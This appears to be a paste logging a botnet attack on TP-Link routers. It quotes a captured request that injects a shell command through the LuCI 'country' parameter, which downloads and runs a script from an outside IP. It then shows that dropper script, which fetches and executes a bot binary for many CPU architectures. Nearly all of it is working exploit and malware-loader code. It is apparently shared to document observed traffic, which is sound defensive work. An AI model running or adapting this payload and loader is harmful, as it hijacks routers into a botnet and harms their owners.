Bot sniffing traffic with requests similar to:http://IP-ADDRESS:80/cgi-bin/l

1. Bot sniffing traffic with requests similar to:
2.  
3. http://IP-ADDRESS:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F147.78.103.155%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)
4.  
5. -------
6.  
7. The file downloaded from the wget command is this:
8.  
9. #!/bin/sh
10. n="arm arm5 arm6 arm7 m68k mips mipsel powerpc sh4 sparc arc"
11. http_server="147.78.103.155"
12.  
13. # send tmp-rw directories
14. cd /tmp
15. cd /var/tmp
16. cd /tmp/tmpfs
17. cd /dev/shm
18. cd /var/run
19.  
20. for a in $n
21. do
22. # download and execute
23. wget http://$http_server/rib/la.bot.$a -O -> dvrLocker
24. chmod 777 dvrLocker
25. ./dvrLocker tplink.$a
26.  
27. # remove new binary
28. rm -rf dvrLocker
29. done
30.